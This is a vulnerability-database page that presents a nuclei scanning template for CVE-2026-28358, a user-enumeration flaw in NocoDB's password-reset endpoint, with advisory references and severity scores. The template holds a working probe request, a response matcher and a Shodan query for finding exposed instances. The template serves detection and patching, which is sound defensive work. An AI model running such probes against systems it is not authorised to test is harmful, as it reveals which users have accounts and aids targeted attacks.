Lucene search
K

NocoDB - User Enumeration

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

NocoDB password forgot endpoint leaked user existence by email; fixed in version 0.301.3.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-28358
2 Mar 202616:16
attackerkb
Circl
CVE-2026-28358
2 Apr 202604:59
circl
CNNVD
NocoDB 安全漏洞
2 Mar 202600:00
cnnvd
CVE
CVE-2026-28358
2 Mar 202616:16
cve
Cvelist
CVE-2026-28358 NocoDB: User Enumeration via Password Reset Endpoint
2 Mar 202616:16
cvelist
EUVD
EUVD-2026-9207
2 Mar 202616:16
euvd
Github Security Blog
NocoDB Vulnerable to User Enumeration via Password Reset Endpoint
2 Mar 202619:42
github
NVD
CVE-2026-28358
2 Mar 202617:16
nvd
OSV
CVE-2026-28358 NocoDB: User Enumeration via Password Reset Endpoint
2 Mar 202616:16
osv
OSV
GHSA-387M-J3P9-3PHP NocoDB Vulnerable to User Enumeration via Password Reset Endpoint
2 Mar 202619:42
osv
Rows per page
id: CVE-2026-28358

info:
  name: NocoDB - User Enumeration
  author: DhiyaneshDk
  severity: medium
  description: |
    NocoDB is software for building databases as spreadsheets. Prior to version 0.301.3, the password forgot endpoint returned different responses for registered and unregistered emails, allowing user enumeration. This issue has been patched in version 0.301.3.
  impact: |
    Attackers can enumerate registered users, potentially aiding further targeted attacks.
  remediation: Update to version 0.301.3 or later.
  reference:
    - https://github.com/nocodb/nocodb/security/advisories/GHSA-387m-j3p9-3php
    - https://github.com/nocodb/nocodb/releases/tag/0.301.3
    - https://nvd.nist.gov/vuln/detail/CVE-2026-28358
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-28358
    cwe-id: CWE-204
    epss-score: 0.00601
    epss-percentile: 0.44403
  metadata:
    verified: false
    max-request: 1
    vendor: nocodb
    product: nocodb
    shodan-query: http.favicon.hash:-2017596142
  tags: cve,cve2026,user-enum,nocodb

variables:
  email: "{{randstr}}@{{rand_base(5)}}.com"

http:
  - raw:
      - |
        POST /api/v1/auth/password/forgot HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Content-Type: application/json
        Origin: {{RootURL}}
        Referer: {{RootURL}}/forgot-password

        {"email":"{{email}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Your email has not been registered"

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022017c44813ec6fa18f989e351e79b7e70cece40629ea9b0ce05b6f48073fbfcb5b022100f135711c8a33720257825a5275a711e0caa33a97041c1bf4dd3cf57b319856a4:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Apr 2026 04:59Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.15.3
CVSS 46.9
EPSS0.00601
SSVC
10